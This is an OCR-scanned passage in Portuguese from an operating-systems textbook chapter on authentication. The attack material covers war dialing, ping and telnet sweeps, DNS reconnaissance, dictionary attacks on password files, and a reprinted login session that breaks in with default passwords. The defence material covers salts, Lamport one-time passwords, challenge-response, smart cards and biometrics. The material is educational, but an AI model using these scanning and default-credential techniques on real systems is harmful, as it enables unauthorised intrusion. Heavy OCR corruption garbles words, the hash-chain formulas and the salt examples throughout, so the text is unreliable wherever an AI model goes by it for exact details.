e Herley, 2007; Ga w e Fellen, 2006), 

Ź de fato relevante se as senhas sao iaceis de adivi- 
nhar? Sini- Em 1998, unia rep o na gem do jornal San Jose 
Mercury News mostrou que um morador de Berkeley, Pe¬ 
ter Shipley, havia eon figura do varios computadorcs sem 
uso como discadores de guerra, quc discavam todos os 
dez mil numeros dc tclcfonc de um tronco (por cxeniplo, 
(4i 5)770-xxxx), em gcral aleatoriameme para nao des- 
pertar a atenęao da companhia telefónica, que desconfla 
desse Lipo de uso e, em geral, Lema deiectado. Depois de 
2,6 milhoes de chamadas, ele localizou 20 mil computado- 
res na Bay Area, 200 dos qnais nao contavam com qual- 
quer segnranęa. Ele estimou que um cracker determinado 
poderia invadir em torno de 75 por cento dos outros que 
aprcscntavam alguma seguranęa {Dcnning, 1999). E isso 
foi na epoca 'jurassica', quando os computadorcs tinham 
dc discar todos os 2,6 milhoes dc numeros dc tclcfonc. 

Os crackers nao estao só na Califórnia. Um cracker 
australiano tentou a mesma coisa. Bntre os varios siste- 
mas quc de invadiu esiava um computador do Citibank na 
Arabia Saudita, que permitiu quc dc obtivesse numeros de 
cartócs dc credito e limites de credito (em uma das vczcs, 
chegando a 5 milhoes dc dólares) e registros dc transaęóes 
(incluindo pdo menos uma visita a um bordd). Um cracker 
amigo dde tambem invadiii o ban co e coteiou ąuatro mil 
numeros de cartao de credito (Denning, 1999). Se tal in- 
formaęao fosse usada de modo inapropriado, o ban co, in- 
dubitavel, enfatica e vigorosanieme negaria que essa falha 
fosse posstvel, alegando que o etieme e que teria per mi Lido 
o acesso a essa informaęao. 

A Internet surgiu como inna dadiYa dos ceus para os 
crackers, pois faz todo o trabalhopenoso para clcs. Nada de 
numeros para discar. Os discadores dc guerra agora traba- 
Iharn assim, Todo computador na Internet tern um ende¬ 
reęo IP de 32 bils usado para identifica-lo. Bsse endereęo 
tambem ć escrito em notaęao decimal pontuada como 
u'xy.z, sendo ca da um dos quatro componentes do ende¬ 
reęo IP um mi mero inteiro enlre 0 e 255. Um cracker pode 
tesiar facilmenie se algom computador tem um endereęo 


iP e se esta ligado c em execuęao digitando, para o sliell ou 
prompt do sistema, o comando 

ping w.x.y.z 

se estivcr ativo, o computador respondera e o programa 
ping dira ąuanio tempo demorou a ida e a volta cm milisse* 
gundos (embora alguns sites agora desabilitem o ping para 
impedir esse tipo de ataque), E facil cscrever um programa 
que faęa ping sistematicamcnte com varios cndcrcęos dc IP, 
dc um modo analogo a o discador dc guerra. Se for encon- 
trado um computador ativo em w<x>y,z, o cracker pode Len¬ 
ta r invadir digi lando 

telnet w.x,y.z 

Se a tentaiiya de conexao for aceita (pode nao ser acei- 
la, pois nem todos os administradores de sistema recebem 
bem as tentativas aleatórias de acesso pela Internet), o 
cracker pode comeęar a tentar os logins e as senhas de suas 
listas. De infcio, e um processo de tentativa e erro. Gontu- 
do, o cracker pode consegiur invadir em poucos minutos 
c capturar o arquivo dc senhas (localizado cm ktdpasswd 
em sistemas UN1X c quc normalnienie pode ser lido pu- 
blicamenie). Depois, ele comeęara a coletar informaęocs 
cslatisticas sobre freąuendas de ocorrencia do acesso por 
usuarios para otimizar fulu ras Lentativas. 

jMuitos daemons de telnet derrubam uma conexao 
TCP subjaceme depois de algumas tcntativas de acesso ao 
sistema sem sucesso, para atrapa!Iiar os crackers. Estes res- 
pondem eon figura udo divcrsos threads em paralelo, a par- 
lir de diferentes maąuinas, simultaneamente. O objęlivo 
e fazer lantas tentalivas por segundo quamo a largura de 
banda permitir, Do porno de vista dcl es, a necessidade de 
pulverizar o ataąue sobre varias maąuinas ao mesmo tem¬ 
po nao e uma seria desvantagcm. 

Em vez de fazer ping em maąuinas na ordem do en- 
dercęo dc IP, um cracker pode quercr atingir uma empresa 
especifica, uma organizaęao ou uma iiniyersidade — por 
exemplo, a Universidadc Fon bar em foobar.edu. Para saber 
qual o endereęo IP quc a universidade usa r e preciso ape- 
nas digitar 

dnsquery foobar.edu 

e o cracker obtera uma lisia dc alguns dos eudercęos IP 
da iiimersidade. Altcrnativa menie, po dem ser u sad os os 
programas mlookup ou dig. (Outra possibilidade e digitar 
'DNS query" em qualquer maąuina de busca para encon- 
trar um site que realize consultas DNS gratuitas, como o 
<www.dnsstuff.com>.) Como muitas organizaęoes tem 
65,536 endereęos consecutivos (uma imidade de alocaęao 
com u m no passa do), unia vez conhecidos os dois primeiros 
bytes de scu endereęo IP (os quais o dnsąuery tom ccc), e 
facil fazer um ping para cada um dos seus 65,536 endereęos 
para verificar quais respondem e quais aceitam. conexoes 
telnet, A partir daC c voltar a tentar nomes e senhas, ou 
seja, urn assuoto que ja foi discutido. 
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Nem e predso dizer que lodo o processo de comeąar 
com um nome de dom mi o, enconlrar os dois primeiros 
byt es dc scus endereęos IP, fazer um ping para cada um 
dcles para verificar ątiais cstao ativos r vcrificar se algum 
deles a celta conexoes telneL e, entao, lenia r de manei- 
ra estatisticamente provavel os parcs (login, seiilia) e um 
processo bastantc adcąuado a aulomaęao. Serao necessa- 
rias diversas tentativas para invadir mas, se ha u ma coisa 
para a qual os computadores sao bons, e repetir a mesma 
seąuencia de comandos varias vczcs ale consegum Um 
cracker com urna concxao dc alta vdocidade — por cabo 
ou DSL — pode programar o processo de iiwasao para 
ejcecutai ditrame o dia todo t, de tempos em lempos, ve- 
rificar o que conseguiu. 

Alem dc telnet, muitos computadores disponibilizam 
uma vartedade dc outros servięos disponwcl atraves da In¬ 
ternet. Gada um dcles esta conectado a uma das 65,536 
portas associadas a ca da endereęo IP. Quandt> um crack er 
cncontra u ni cndcrcęo IP ativo, cle frcąucniemcnte cxe- 
cutara uma varredura de porta para descobrir o que esta 
disponweL Algumas dessas portas podem oferecer meios 
adirionais para invarfir 

Um ataque por telnet ou varredura de porta e obvia- 
menie md hor que um discador de guerra, pois e muito 
mais rapido (nao gasta tempo de discagem) e muito mais 
ba rato (nao e predso pa gar tarifas telefonicas}, mas de só 
funciona para maąuinas que estejam conectadas a Internet 
e quc a celt cni conexoes telnet. Contudo, muitas empresas 
(e ąuase todas as tmiversidades) aceitam conexóes telnel 
para que os luncionarios em uma viagem de negócios ou 
em um escritório de uma filial (ou esiudantes em tasa) 
possani se conectar re mota me nie. 

Nao só as senhas dos ustiarios sao frageis, mas, algumas 
vezcs, a senlia do root (raiz) lambcni o e. Partieularmeme, 
algumas instalaęóes nim ca tomam o cuidado de trocar as 
senhas padraocoin as quais os sistemas fora i u coufigurados 
pela primcira vez. Cliff Stoli, um astrónomo de Berkeley, 
havia observado algumas irregularidades cm seu sistema e 
armou uma armadilha para o cracker que tentava invadi- 
-lo (Stoli 1989). Ele obscrvou a sessao ilustrada na Figura 
9.16 digliada por um cracker quc ja havia invadido uma 
maąuina do Lawrence Berkeley Laboratory (LBL) e que 
cstava tentando e tui ar mais uma vez> A conta uucp {UNIK 
to UNIX copy program — programa de cópia dc UNIX para 
UNIX) e utilizada para o trafego de rede entre maąuinas c 
detem poder dc superusuario; portanto, o cracker estava 
em uma maąuina do Departamentu de Energia dos Bsta- 
dos Unidos como superusuario. Felizincnte, o LBL nao tein 
projetos de armas nudeares; contudo, seu laboratório coli- 
gado, em Livermore, tern. Espera-se que a segliranęa desses 
laboratórios mdhore, mas ha poucas razóes para acreditar 
ihsso, uma vez qtie, em 2000, outro la bora tor i o de armas 
n u elear es, Los Alamos, perdeu um disco rigido repleto de 
informaęoes sdedonadas. 


LBL> telnet e1xsi 
ELKSI AT LBL 
LOGIN: root 
PASSWORD: root 

INCORRECT PASSWORD, TRY AGAIN 
LOGIN: guest 
PASSWORD: guest 

INCORRECT PASSWORD, TRY AGAIN 
LOGIN: uucp 
PASSWORD: uucp 

WELCGME TO THE ELXSI COMPUTER AT LBL 

I Figura 9.16 Como um cracker irwadiu o computador do 
Departamentu de Energia dos Estados Unidos no LBL, 

Uma vez quc ten ha iiwadido um sistema e se tornado 
supem su ario, um cracker pode instalar um farejador de 
pacotes (packetsniffer) — um software que cxamina todos 
os pacotes da rede que cli ega m c que saem tentando iden- 
tificar padroes, Um padrao especialmente interessante de 
identificar e sobre pessoas duranie a obienęao de acesso a 
uma mapuina remota, especialmente como superusuario. 
Essa mformaęao pode ser desviada para fora, em um arqui- 
vo, para que o cracker possa pegar mais tarde quando quh 
ser. Desse modo, um cracker que invade unia maąuina cuja 
seguranęa e fragil pode usa-la para invadir uma maąuina 
com seguranęa mais rfgida. 

Ha cada vez mais invasóes sendo feitas por usuarios 
tecnicamente leigos qne apenas executatn códigos inier- 
pretados {Scripts} que encontraram na Internet. Esses códi¬ 
gos interpretados fazem ataques de forca bruta, conforme 
dcscrito anteriormente, ou lentam explorar falhas conheci- 
das em programas espedficos. Os hackcrs rcais referem-se 
a des como script kiddies ('garotada dos códigos Inter- 
prciados'). 

Em geral, o script kiddie nao tein um objeiivo espe- 
cifico nem pretende roubar alguma informaęao em pani- 
cular. Ele quer apenas saber quais maąmnas sao faceis de 
invadir. Alguns deles chegam a pegar uma rede a o acaso 
para atacar, usando um numero alealório de rede (a parte 
mais significativa do endereęo IP). Entao des teslam todas 
as maąumas da rede para verificar qual respondc. Unia vez 
gerado um banco dc dados dc endcreęos IP validos, cada 
maąuina e atacada em seąuencia. Como resultado dessa 
metodologia, pode acontecer de uma nova maąuina, em 
uma i ustalaj o mil tiar, ser atacada depois de algumas horas 
conectada a Internet, mesmoąue ninguem, excetooadmj- 
nistrador do sistema, saiba de sua existeneia. 

Seguranęa por senhas do UN|X 

Alguns sistemas opera do na is (mais antigos) mantem o 
arquivo de senhas no disco na forma dccriptada, mas pro- 
tegido pelos mccanismos normais de proteęao do sistema. 
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Manier todas as senhas em um arquivo decriptado no disco 
e procurar problemas, pois em geral muitas pessoas tern 
acesso ao disco (admimstradores, operadores da inaąuma, 
pessoal dc manutenęao, programa dores, gerentes e talvez, 
atć mesmo, secretarias). 

Urna soluęao melhor, osada no UNIX, funciona do se- 
guinie modo: o próg rama de acesso ao sistema pede que 
o usuario digiie seu nome e senha. Esta e imediatamente 
'criptografada', usando-se a senha como chave criptografi- 
ca de nm bloco fixo de dados. EEetivamente, e executada 
urna funęao de senlido linico, com a senha como entrada e 
urna funęao de senha como safda. Esse processo naoconsti- 
tui realmcnte unia criptografia, masęniais facił considerar 
como se o fosse* Entao, o programa de acesso ao sistema le 
o arquivo de senhas, quc ć apenas urna serie de linhas cm 
ASCII u ma por usuario, a te encontrar urna linha contendo 
o login do usuario. Se a senha fcripiografada) contida nessa 
linha fora mesma senha criptografada que acabou de ser 
calculada, sera permitida a entrada no sistema; do contra- 
rio, a entrada sera reensada. A vantagem desse esquema 
e que ninguem, nem mesmo o superusuario, podera ver 
qual e a senha do usuario, pois clas nao sao annazenadas 
dccriptadas em nenhuni lugar do sistema. 

Contudo, esse esąuema pode ser visto de o utrą manei- 
ra: um cracker primeiro constrói um dicionario de senhas 
mais comims, como fizeram Morris c Thompson* Em al¬ 
gom memento, essas senhas sao criptografadas usando o 
aIgoriimo conhccido, Nao imperia o quanto esse processo 
dc mora, pois ele e feito antes da iiwasao. Agora, munido de 
uma lista de pares (senha, senha criptografada), o cracker 
a taca. Ele le o arquivo dc senhas {publicamente acessivel) 
c captura todas as senhas criptografadas* Essas senhas sao 
comparadas as senhas criptografadas de su a lista. Para ca da 
accrto, o nome de entrada e a senha decriptada sao, entao, 
conhecidos. Urn programa simples utilizando a linguagem 
do shell pode automalizar esse processo e resolver isso em 
unia fraęao de segundo, Uma cxccuęao desse programa 
desvendaria dezenas de senhas* 

Reconhecendo a possibilidade desse ataąue, Morris e 
Thompson dcscrevcram uma tecnica que reverte o ataąue, 
ternando-o quase inutil. A ideia deles e associar a cada se¬ 
nha um n ii mero alcatório de n bits r chamado sal [salt). O 
mimem alcatório e alterado semprc quc a senha for allc- 
rada. O mimem alcatório fica arniazenado no arquivo de 
senhas decriptado; portanto, todos podem le-lo. Em yezde 
apenas annazenar □ senha criptografada no arquivo de se¬ 
nhas, a senha e o mi mero alcatório sao, primeiro, eonca- 
tenados e depois juntamente criptografados. Esse resuhado 
eneriptado e armazenado no arquivo de senhas, conforme 
mostra a Figura 9.17 para um arquivo de senhas com cinco 
usuarios — Barbara, Tony, Laura, Mark e Deborah. Cada 
usuario tem uma linha no arquivo, com tres entradas sępa- 
radas por yirgulas: login, sal e senha + sa! criptografado. A 
notaęao e{Dog, 423S) represcnla o resuhado da concalcna- 
ęao da senha de Barbara, Dog, com seu sal atribufdo aleato- 


Barbara, 4238, e(Dog4238)_ 

Tony, 2918, e(6%%TaęFF291S) 

Laura, 6902, g(Shakespeare69Q£) 

Mark, 1694, e(XaB@Bwcz1694) 

Deborah, 1092, e(lordByron,lQ&g) 

I Figura 9.17 O uso de sal no combate a pre-computaęao de 
senhas eneriptadas. 

riamente, 4238, e a execuqao da funęao de criptografia, e. 
O resuhado da criptografia e que lica armazenado como o 
tcrcciro campo da entrada dc Barbara. 

Agora considere as implkaęóes para um cracker que 
ąueira eonsiruir uma lisia de senhas mais comuns, cripio- 
grafa-las e salvar o resuhado em um arquivo ordetiado, f, 
dc modo quc qualqucr senha possa ser facilmcnte vcriłi- 
cada. Se um intruso suspeiiar que Dog pode ser uma se¬ 
nha, nao sera mais su fi ci en te apenas criplografar Dog e pór 
o resuhado em f Ele tera de criplografar 2' J cadeias, como 
DoijÓÓGO, DogOOOL Dog0002 e assim sucessivamente e inseri- 
-las todas no arquivo /, Essa tecnica aumenta o tamanho de 
/cm 2\ O UNIX usa esse metodo com = 12. 

Para uma maior seguranęa, algumas yersoes mais 
modernaś do UN1X fazem com que o próprio arquivo de 
senhas seja ilegfvel, porem fornecem um programa para 
verilicar suas entradas ąuando forem reąuisitadas, adicio- 
nando um atraso suficiente para atrapaIhar bastame qual- 
quer intruso. A combinaęao do sal com o arquivo de senhas 
i)cgfvcis, a nao ser indiretamente (e lentamcme), pode ofe- 
recer rcsistencia a maioria dos ataąucs. 

Senhas de uso uttico 

A maioria dos superusuarios encoraja scais pobres usua¬ 
rios monais a trocarem a senha unia vez por mes. Os usuarios 
ignorant. Ainda mais cxtremo e o procedimcnto dc altcrar 
senhas todas as vezes, o quc cna senhas de uso unico, 
Qtiando sao usadas, o usuario obtein um livro contendo uma 
lisia de senhas. Cada vez que ele entra no sistema, usa-se a 
senha seguinte da lista. Se um invasor descobrir uma se¬ 
nha, cle nao ganhara nada, pois, na próxinia vcz, devera 
ser digitada uma senha diferente* Sugere-se ao usuario 
que evite perder o l!vro de senhas* 

Na yerdadc, um livro nao c imprescindivel, pois Lcslie 
Lamport inventou um esąuema superior, que permite que 
um usuario acesse o sistema segurameme em uma rede 
insegura usando senhas de uso u ni co (Lamport, 1981), 
O metodo de Lamport pode ser empregado para que um 
usuario, a partir de um PC em casa, conecie-se a um ser- 
vidor pela Internet, mesmo quc os invasores possani ver c 
registrar lodo o uafego cm ambas as direęoes* Alem disso, 
noo e prcciso armazenar informaęóes secretas no sistema 
de arquivos do servidor nem no PC do usuario, Esse 
metodo as vezes e chamado de cadeia de resumo sen- 
tido unko. 
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O algoritmo e baseado em unia funęao de sentido unico, 
isto e, uma funęao y = f (x) P cuja propriedade e: dado x, ffca 
facil encontr ary, mas, dacio y, ć compuiacionalmenic invii- 
vel encontrar a. A cm rada c a safda devem ser do ritesmo 
tamanho — por excmplo, dc 256 bits. 

O usuario escolhc uma sen ha secreta c a mcmoriza. 
Ele tambem escolhe um valor inteiro, n, que denota quan- 
tas sen bas de uso unico o algoritmo e ca pa z de gerar. Por 
cxemplo, considere n - 4, embora na prali ca o valor de ti 
seja muito maior. Sc a senha secreta for s, a pnmeira sen ha 
sera obtida executando-se a funęao dc uma via u vezes; 

=/{/(/(/ W))) 

A segunda senha e obtida executando-se a funęao de 
unia via n- 1 vezes: 

p 2 =nfifm 

A terceira senha executa/duas vezes e a quarra ape- 
nas uma vez, Em gcral, P._ t = /(P.). O falo principal a ser 
percebido e que, dada qualquer senha na sequencia, e facil 
calcu lar a senha cmterior pela sequencia numerka, mas e 
impossfvel calcular a próxima. Por exemplo, dada P 7 , c facil 
encontrar P , mas e irnpossfvel encontrar P y 

O senidor e inicializado coni P Qf que corresponde a 
/(F g )_ Esse vator e armazenado na entrada do arquivo dc 
senhas, associado ao norne do usuario seguido do valor 
inteiro 1, indicando quc a próxima senha sera P r Quando 
o usuario ąuiser accssar o sistema pcla prinicira vez, cle 
enviara seu nomc de entrada para o senidor, que res- 
pondera enviando o valor inteiro qne esta no arquivo de 
senhas, o valor L A maquina do usuario responde eom 
P v que pode ser calculado localmcnte a parlir de $, que 
acabou de ser digitada. O seryidor, entao, calcu la f{P Y ) e 
compara com o valor armazenado no arquivo de senhas 
(P 0 ). Se os yalores forem iguais, o acesso sera permUklo, o 
inteiro sera incremcmado para 2 e P l sobrescrevera P no 
arquivo de senhas, 

No acesso seguinte ao sistema, o senidor eiwia um 2, 
e a maquina do usuario ca ku la P,. 0 senidor entao calcu la 
/(/\) c compara com a entrada no arquivo de senhas. Sc os 
yalores forem iguais, o acesso sera permitido, o inteiro sera 
incrcmcnlado para 3 e P, sobrescrevera P, no arqnivo de se¬ 
nhas. O que faz esse esąuema funcionar e que, mesnio que 
um invasor possa capturar P, nao ha como ele calcular P. + l 
a parli r de P-, exceio ]H que ja foi usado e agora e i nu ii!. 
Quando todas as n senhas tiverem sido usadas, o sen idor e 
reinidado com uma nova chavc sccreia. 

Autenticaęao por resposta a um desafio 

Unia yariaęao da ideia de senhas e obrigar cada novo 
usuario a fomecer uma longa lisia de perguntas e respostas 
que sao emao arniazenadas seguramente no senidor (cripto- 
grafada, por exemplo). As questoes devem ser escolhidas 
de modo que o usuario nao predse escreve-las. Alg uma s 
ąuestdes possfveis sao 


1. Quem e a irma da Mariana? 

2. Em qttal rua ficava sua escola primaria? 

3. 0 que o professor Elisiario ensinava? 

No processo de acesso a o sistema, o senidor faz alea- 
loriameme uma dessas questóes e verifica a resposta. Para 
tornar isso pratico, coniudo, sao necessarios muitos pares 
de pergiintas e respostas. 

Ouira variaęao e a autenticaęao desafio-resposta 

Ncsse caso, o usuario escolhc um algoritmo quando se ca- 
dastra como usuario — por exemplo H x 2 , Quando o usuario 
acessa o sistema, o senidor envia ao usuario um argumen¬ 
tu (7, por esemplo) e, ncsse caso, o usuario digita 49. O 
algoritmo pode ser diferente de matiha e a tarde, em dife- 
rentes dias da semana, c assim por diantc. 

Se o terminal do usuario liver poder compuladonal 
real como um computador pessoal, um PDA {persormldigha! 
assistait — assistente dighal pessoal) on um t ele fon e celu- 
lar, podera ser empregada uma resposta niais poderosa ao 
desafio. Anteripadamente, o usuario seleciona uma chave 
secreta, k t que e inicialmcnte inserida manualmentc no sis¬ 
tema senidor. Tambem e mantida uma cópia (segura) no 
computador do usuario. No moment o do acesso, o senidor 
emia um nu mero aleatório, r, para o computador do usu¬ 
ario, que entao ca kula /(r, k) e envia o resultado de volta, 
sendo/uma funęao publicamenie conhecida. Ele faz o pro¬ 
pno caiculo c ycrifica se o resultado eiwiado esta de acordo 
com o caiculo. A vamagem desse metodo sobre o esąuema 
por senhas e que, mesnio que um 'araponga' vcja c rcgtstrc 
todo o trał ego em ambas as direęoes, ele nao sabera nada 
que o ajude na próxima vez. E claro quc o funęao, f, dcvc 
ser complicada o suficiente para que k nao possa ser dedu- 
zida, mesnio dado um grandę conjunto de observaęoes. As 
funędes de resumo criptografico sao uma boa alternativa, 
sendo o argurnento XOR de r e k. Sabe-se que essas funęoes 
sao de diffcil reversao. 

9AJ2 1 Autenticaęao usando um objęto lisico 

O segundo metodo de autenticaęao de usuarios consis- 
te em yerilicar a posse de algum objeio lisico e nao algurna 
cotsa que des saibam. Para esse fim, as chaves de metal 
para portas sao usadas ha seculos. Atualmente, um obję¬ 
to fisi co basta n te em pręga do e o ca i tao de piast i co, que e 
inserido em um leitor associado ao computador. Em geraf, 
o usuario nao deve somente inserir o cartao, mas tambćm 
digitar uma senha, a Hm de impedir que alguem use um 
cartao perdido ou roubado. Visto desse modo, o uso do ca i 
xa automatico de um banco ou ATM (automated telkr ma¬ 
chinę — maquma de atendimento automalizado) comeęa 
com o usuario se conectando ao computador do banco por 
um terminal remoto (a maquina docaixa automatico), por 
meio de um cartao de plastico e uma senha (na maioria 
dos parses, um código de ideiitificaęao pessoal de quatro 
di git os, mas isso serve apenas para evitar o custo de colocar 
um teclado compkto em cada ATM). 
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A inforniaęao fica retida nos cartoes de plastico por 
dois lipos de dispositivos: cartoes com u ma faixa magnetica 
e cartoes com u ni chip. Os cartoes com u ma faixa magne¬ 
tica podem ahrigar ccrca de 140 byt es de inforniaęao es- 
crita cm urn pcdaęo de fita magnetica colada nas costas do 
cartao* Hssa inforniaęao pode ser lida por um terminal e 
eiwiada a um computador central. Mn i las vczes a infonna- 
ęao contćm a senha do usuario (por exemplo, o código de 
identificaęao pessoal}, para que o terminal possa identiiicar 
o usuario, mesmo quando a tonexao com o computador 
Principal tenha cafdo. Normalmente, a senha e criptogra- 
fada por uma chave conhecida somente pelo banco. Esses 
cartoes custam, cada um, em torno de 10 a 50 centavos de 
dolar — as variaęoes de preęo dependent, por exemp!o, da 
existenda de um adcsivo holograflco na frentc do cartao c 
do volume da produęao. Como meio de identiiicar usuarios 
cm gcral, os cartoes de faixas magnćticas nao sao seguros, 
pois o eqiiipamcnto que os Ic e que cscreve neles ć ba rato 
e bastanle difundido. 

Os cartoes com chip contem um circuito integrado 
(chip). Esses cartoes podem ser ainda subdivididos em duas 
categorias: cartoes com valores armazenados e cartoes inte- 
ligcntcs, Os cartoes com valores armazenados contem 
inna pcqucna quantidade de memória (normalmente mc- 
nos de i KB) usando tecnologia ROM para pcmiitir quc o 
valor permaneęa mesmo depois quc o cartao tenha sido rc- 
inovido do leitor e fique sem alimentaęao de energia. Nao 
ha CPU no cartao e, assim, o valor armazenado deve ser 
alterado por uma CPU externa (no leitor). Esses cartoes sao 
produzidos em massa, aos millioes, por cerca de um dolar, 
e sao usados, por exemplo, como cartoes telefonicos pre- 
-pagos, Quando se faz uma ligaęao, o telefone apenas reduz 
o valor no cartao, mas nenhuma cćdula muda realmente 
de ma os. Por isso, esses cartoes gcralmcntc sao cmitidos 
por uma empresa para serem usados somente cm suas ma- 
ąuinas (por excmp]o, telcfoncs ou maąuinas de venda). 
Eles poderiam ser usados na autenticaęao de usuarios nos 
sisiemas, pois arnw.enariam uma senha do 1 KB que seria 
eiwiada pelo leitor para urn computador central, mas isso 
raramente e feilo. 

Contudo, nos dias dc hojc, muito do trabalho sobie 
segura nęa esta eon cent rado nos cartoes inteligent es, 
quc tein algo como uma CPU dc 8 bits e 4 MHz. 16 KB 
dc ROM, 4 KB de ROM, 512 byles de RAM e um tana! dc 
comunicaęao com o leitor de 9.600 bps. Os cartoes estao 
fteando mais inteligentem com o tempo, mas encomram-se 
restritos a varios fatores, entre eles a profundidade do 
chip (ja que ele fica embutido no cartao), a largura do chip 
(nao pode quebrar ąuando o usuario flexiona o cartao) e 
o cu sto (normalmente de 1 a 20 dolar es, dependenci o da 
capacidade da CPU, do tamanho da memória e da presenęa 
ou nao dc um coprocessador criptografico). 

Os cartoes inteligentes podem ser usados para conter 
dinheiro, como nos cartoes de valor armazenado, mas com 
uma seguranęa e uma imWersalidade muito maiores. Os 


cartoes podem ser carregados com dinheiro em um caixa 
automatico ou em casa, por telefone, usando-se um leitor 
especial Eomecido pelo banco. Quando inserido em um lei¬ 
tor de um comerdante, o usuario pode autorizar o cartao a 
deduzir unia certa ąuantia dc dinheiro do cartao (digitando 
S1M), fazendo com que o cartao cnvic uma peąucna men- 
sagem criptografada ao comerdante, Mais tardc, o comer- 
ciante pode Iransferira mensagem para um banco, a firn de 
ser creditado peta quantia paga. 

A grandę vantagem dos cartoes inteligentes — por 
exemplo, com relaęao aos cartoes dc crcdito c de debito — 
e que des nao predsam de uma concxao on-linc com um 
banco. Tcntc comprar um chocolatc cm uma loja c insista 
em pagar com um cartao dc crcdito. Sc o comerdante nao 
accitar, diga que voce nao tern dinheiro vivo, Voce des- 
cobrira que o comerdante nao vai gostar muito da ideia 
(porque os enstos da administradora de cartoes reduzem 
o lucro sobre a venda do item). Isso torna os cartoes in- 
teligentes uteis para compras em pequenas lojas, para pa¬ 
gar telefone, para pa rq uf metr os, para maquinas de venda 
e muitos outros dispositivos que normalmente reąuerem 
fichas ou moedas. Eles estao sendo amplamente usados na 
Europa c cada vcz mais dtfundidos em todos os lugarcs. 

Os cartoes inteligentes tern muitos outros usos potem 
ciais (por exemplo, codificar com seguranęa as alergias dos 
titulares e outras condięóes de saude para uso em emergen- 
cias), mas este nao e o moment o para abordar esse assunto. 
Nosso interesse aqui e como eies podem ser usados para 
autenticaęao segura de acesso ao sistema. O conceito basico 
ć simplcs: um cartao inteligente e peąueno, e um compu- 
tador quc pode engajar-se em uma discussao (chamada dc 
protocolo) com um computador central para autcnticaro 
usuario. Por exemplo r um usuario que quetra comprar algo 
em um sile de comercio eletronico insere um cartao inteli- 
geme em um leitor, em casa, cotiectado a seu computador 
pessoah O site de comercio eletronico nao somente usaria 
o cartao inteligente para autenticar o usuario de maneira 
mais segura que uma senha, mas tambem poderia deduzir 
o vałor da compra diretamente do cartao inteligente, elimi- 
nando grandę parte da sobrecarga (e do risco) associada ao 
uso dc cartoes dc crcdito para compras on-linę. 

Ha varios esquemas de autenticaęao que podem ser 
empregados com um cartao inteligente. Um simples es- 
ąuema de desafio-resposta funciona da segumte maneira: 
o servidor envia um nu mero aleatório de 512 bits para um 
cartao inteligente, que, entao, adidona a esse ntimero a 
senha do usuario de 512 bits armazenada na ROM do car¬ 
tao. A soma c, entao, elcvada ao ąuadrado c, do resultado, 
os 512 bits do mcio sao enviados dc volta ao semdor, quc 
eon hece a senha do usuario e pode calcu lat se o rcsulta- 
do esta ou nao cotrelo, A sequencia e most rada na Figura 
9.18. Se um 'araponga' ve as duas mensagens, nao tera 
muito semido para ele e gravada para usa-la no futuro nao 
sera tli ii, pois, no prómno login, sera eiwiado um numero 
aleatório diferente de 512 bits. Ś dato que pode ser usado 






404 Sistemas operacionais modern os 



Inteligente 

1 Figura 9.18 Uso de urn cartao inieligente para autenticaęao. 


um algoritmo mais complicado qne sim pleśnienie elevar ao 
ąnadrado, e em geral isso e kito. 

Oma desvaniagem dc qualquer protocolo criptografico 
fixo e que, com o tempo, de pode ser descoberto, tornando 
o cartao inteligente i mil ii. Um modo de evilar isso e usar a 
ROM do cartao, nao para um protocolo criptografico, mas 
para um interpretador Java, O protocolo criptografico real 
e, entao, carregado no cartao como um programa Java bi¬ 
li ario e executado interpretativaiuen.te. Desse modo, assim 
que um protocolo for descobmo, um novo podera ser ins- 
talado, de qualquer lugardo mundo, instamanea nieme: da 
próxima vez que o cartao for utilizado, um novo software 
e mstalado nele, Urna desvantagem dessa estratćgia e que 
torna um cartao lento mais lento ainda, mas, como a lec- 
nologia se aperfcięoa, esse metodo mostra-se muito fiexi- 
vel Outra desvantagem dos cartóes inteligentes e que urna 
perda on um roubo pode cxpor o sistcma a um ataąne por 
canal lateral, como a analise da alimemaęoo de energia. 
Observando a energia eleirica consumida duranie rcpeii- 
das operaęoes da cripiografia, um especialisla, com equipa- 
mentos adeqnados f pode ser capaz de iiiferir a chave. Me- 
dir o tempo da criptog rafia tle varias chaves espedahnente 
escolhidas tambem pode fornecer valiosa informaęao sobre 
a chave. 

9.4.31 Autenticaęao usando biometria 

O tercciro metodo dc autenticaęao medc caractensticas 
fisicas do usuario, quc scjam dificeis dc falsificar. Jsso c cha- 
mado dc biometria (Pankami ct al. r 2000). Por cxcmplo, 
urna imprcssao digita! ou um identificador de vozno termi¬ 
nal poderia verificar a identidade do usuirio. 

Um sistema biometria} tipi co e formado por duas par¬ 
łeś: cadastramento e identificaęao. Durante o cadastramen- 
lo, as caractensticas do usuario sao me di da s e os resultados 
sao digitalizados. Entao, os alributos significatkos sao cx- 
trafdos c armazenados cm um registro associado ao usua¬ 
rio. O registro pode ser ma nl id o em um ban co de dados 
central (por exemplo, para acesso a um computador remo- 
lo) ou armazenado em um cartao inteligente que o usuario 


carrega e insere depois em um leitor remoto (por exemplo r 
em um caixa automatico). 

A outra parte e a identificaęao. O usuario sc exibe e 
fornece um nonie dc usuario* Entao, o sistema faz no- 
vamente a medięao. Se os novos valores forem os mes- 
mos que os amostrados no momento do cadastramento, o 
acesso sera permitido; caso comrario, o acesso sera rejcita- 
do. O nonie de usuario e necessario, pois as medidas nao 
sao exatas; portanto, e diffdl hidexa-las e depois buscar o 
usuario pelo uidice. Alem disso, duas pessoas podem ter 
as mesmas caractensticas, exigindo, assim, que as caracie- 
risticas medidas para correspondcr a um usuario espcafico 
sejam mais rfgidas do que apenas exigir que correspon- 
dam aquelas de um outro usuario qualquer. 

A caracteristica escolhida deve ter urna variabilidade 
suficienie para que o sistema possa, sem erro, distinguir 
urna demie muitas pessoas. Por exemplo, a cor dos cabe- 
los nao e um bom indicador, pois muitos compartiłham 
essa mesma caracierisiica. Alem disso, a caracteristica nao 
pode variar muito com o tempo. Por exemplo r a voz de 
urna pessoa pode ficar diferente quando o ambiente estiver 
mais frio e urna face muda por causa de urna barba ou de 
urna iii a qu ia gem que nao estava presente no momento do 
cadastramento. Como os valores das amostras posteriores 
nunca sera o exatamente iguais aos valores cadastrados, os 
projetistas dos sistemas devem decidir o mvel de semelhan- 
ęa para que os valores possani ser accilos. Em panien lar, 
devem decidir sc e piór rejcitar um usuario legitimo de vez 
em quando ou as vezes deixar um impostor entrar. Um 
sile de cotnercto ektronico pode decidir que rejeiiar um 
clicnte leal c piór que aceitar algumas fraudes. Ja um local 
com armas nucleares deve decidir se recusar o acesso a um 
fimcionario verdadeiro seria melhor que deixar enirar es- 
tranhos aleatorianieme duas vezes ao ano. 

